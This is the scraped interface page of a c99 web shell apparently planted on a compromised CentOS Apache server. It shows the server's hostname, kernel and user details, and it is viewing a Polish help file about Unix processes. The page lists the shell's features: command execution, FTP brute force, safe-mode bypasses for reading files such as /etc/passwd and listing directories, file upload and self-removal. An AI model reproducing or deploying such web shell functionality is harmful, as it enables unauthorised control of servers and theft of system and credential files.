!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/proc/help/   drwxr-xr-x
Free 53.69 GB of 127.8 GB (42.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     intro.pl.UTF-8.html (1.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Procesy uniksowe
Proces jest to po prostu działający w Twoim systemie program. Twoja przeglądarka, zarządca okienek, okienko terminala czy X serwer - wszystkie są procesami, z którymi się bezpośrednio komunikujesz. Wiele innych procesów, jak serwery WWW czy inne zadania systemowe, działa w tle. Za każdym razem, gdy wydasz polecenie takie, jak ls czy pwd tworzony jest nowy proces, jednakże takie procesy są zazwyczaj krótkożyjące.

Każdy proces posiada swój unikalny numer ID, zwany numerem ID procesu lub PID-em. Każdy działający w danej chwili proces ma inny numer ID, lecz PID-u procesów, które zakończyły działanie mogą być później użyte ponownie.

Oprócz procesu inicjującego (zazwyczaj zwanego init), każdy ma swojego rodzica, który go utworzył. Na przykład, jeżeli uruchomisz vi z linii poleceń, rodzicem vi będzie twoja powłoka. Proces może mieć dowolna liczbę potomków, ale tylko jednego rodzica.

Każdy proces działa z prawami pewnego użytkownika i pewnej grupy, które mają zastosowanie przy dostępie przez niego do plików. Użytkownicy i procesy mogą zabijać jedynie inne procesy, których są właścicielami, za wyjątkiem roota, który może zabić wszystko.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0129 ]--